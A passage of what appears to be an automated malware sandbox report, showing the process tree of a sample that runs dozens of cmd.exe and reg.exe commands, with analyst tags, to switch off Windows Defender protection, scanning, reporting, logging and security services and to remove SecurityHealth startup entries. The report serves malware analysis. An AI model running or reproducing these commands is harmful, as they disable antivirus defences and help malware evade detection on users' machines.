  2⤵
  PID:2284
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f
    3⤵
    PID:5780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:2396
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:4212
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:1560
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:5988
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3412
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
  2⤵
  PID:1608
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    3⤵
    PID:5788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f"
  2⤵
  PID:2984
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f
    3⤵
    PID:5708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f"
  2⤵
  PID:4008
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f
    3⤵
    PID:4336
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
  2⤵
  PID:1144
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
  2⤵
  PID:268
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
    3⤵
    PID:3192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f"
  2⤵
  PID:3160
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f
    3⤵
    PID:5956
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:2504
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3848
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f"
  2⤵
  PID:2680
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f"
  2⤵
  PID:2956
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f
    3⤵
    PID:6044
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f"
  2⤵
  PID:3520
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f
    3⤵
    PID:5684
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f"
  2⤵
  PID:3164
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
    3⤵
    PID:5828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:2400
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:3656
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:3372
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:6092
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:2932
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3228
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:2524
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5724
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:3352
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5600
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:3144
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5740
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f"
  2⤵
  PID:2712
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:6100
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
  2⤵
  PID:2204
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
    3⤵
    PID:5844
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:3560
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5716
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:3188
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:4144
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:3640
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:3904
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:3316
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:2964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:6020
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:3792
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:5932
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f"
  2⤵
  PID:2732
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f
    3⤵
    PID:4116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:3680
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:5892
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f"
  2⤵
  PID:3344
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f
    3⤵
    PID:6012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:3620
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:2236
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:3196
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:4128
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:3700
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f
    3⤵
    PID:4120
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:3584
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:2832
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f"
  2⤵
  PID:2228
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f
    3⤵
    PID:6028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:4028
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:4136
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f"
  2⤵
  PID:2128
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f
    3⤵
    PID:2884
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:3800
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:5980
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f"
  2⤵
  PID:3772
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f
    3⤵
    PID:5868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f"
  2⤵
  PID:3300
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f
    3⤵
    PID:3068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:3880
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:5732
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:3672
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:4196
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f"
  2⤵
  PID:3096
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f
    3⤵
    PID:6116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:3804
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:4900
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:3324
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:5700
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f"
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f
    3⤵
    PID:4896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
  2⤵
  PID:676
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
    3⤵
    PID:5748
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:2912
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:2992
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:3576
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:2112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f"
  2⤵
  PID:2276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f
    3⤵
    PID:5884
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
  2⤵
  PID:3688
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    3⤵
    PID:4908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3652
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:5692
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3812
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies security service
    PID:5860
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
  2⤵
  PID:3720
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
    3⤵
    - Modifies registry key
    PID:5964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3076
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:5820
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3864
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:4056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3564
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:2828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3676
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:5804
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:2184
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:3364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:4048
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:5900
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:3944
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:5908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:820
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    PID:5592
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
  2⤵
  PID:2792
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
    3⤵
    PID:6076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f"
  2⤵
  PID:3024
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f
    3⤵
    PID:5104
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f"
  2⤵
  PID:932
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f
    3⤵
    PID:5812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f"
  2⤵
  PID:2240
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f
    3⤵
    PID:3980
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:2124
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:5852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f"
  2⤵
  PID:3928
